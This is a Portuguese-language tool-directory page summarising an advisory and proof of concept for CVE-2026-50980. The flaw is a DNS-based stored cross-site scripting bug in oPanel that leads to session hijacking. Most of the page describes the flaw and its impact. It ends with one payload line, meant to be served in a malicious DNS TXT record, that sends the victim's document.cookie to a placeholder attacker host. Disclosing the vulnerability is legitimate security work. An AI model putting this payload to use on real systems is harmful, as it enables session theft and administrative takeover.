Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-50980 — oPanel Cross-Site Scripting (XSS) Baseado em DNS e Sequestro de Sessão | Kitploit
Ferramentas/GitHubGitHub/bugresearch/cve-2026-50980
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAnálise de DNS
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel Cross-Site Scripting (XSS) Baseado em DNS e Sequestro de Sessão

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-50980: Cross-Site Scripting (XSS) Baseado em DNS e Sequestro de Sessão no oPanel

Visão Geral

  • ID do CVE: CVE-2026-50980
  • Produto: oPanel
  • Versões Afetadas: < v1.20.25
  • Tipo de Vulnerabilidade: Cross-Site Scripting (XSS) Armazenado via DNS / Sequestro de Sessão
  • Severidade: Alta (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

Descrição

Existe uma vulnerabilidade de Cross-Site Scripting (XSS) no oPanel (versões anteriores à v1.20.25) devido ao tratamento e à sanitização inadequados das respostas DNS. Quando o painel realiza uma consulta DNS (por exemplo, recuperando informações de domínio, verificando a propagação de DNS ou consultando registros TXT) contra um servidor de nomes controlado pelo atacante, ele reflete os registros DNS retornados diretamente na interface web sem codificação HTML adequada.

Um atacante pode explorar isso configurando um servidor DNS malicioso para responder a consultas de registros TXT com um payload JavaScript malicioso. Quando um usuário autenticado do oPanel (como um administrador) visualiza a página onde a resposta DNS é exibida, o payload é executado no contexto da sessão do navegador dele.

Impacto

A exploração bem-sucedida permite que um atacante execute JavaScript arbitrário no navegador da vítima. Conforme demonstrado na Prova de Conceito, isso pode ser usado para roubar cookies de autenticação sensíveis (document.cookie), levando ao sequestro completo da sessão e ao acesso administrativo não autorizado ao ambiente oPanel.

Prova de Conceito (PoC)

A exploração exige que o atacante configure um servidor DNS malicioso e um listener HTTP para capturar os dados exfiltrados.

1. Configuração da Infraestrutura do Atacante

O atacante executa um servidor DNS malicioso na porta UDP 53, configurado para responder a qualquer consulta TXT com um payload de XSS.

Payload de Registro TXT Malicioso:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
Baixar ferramenta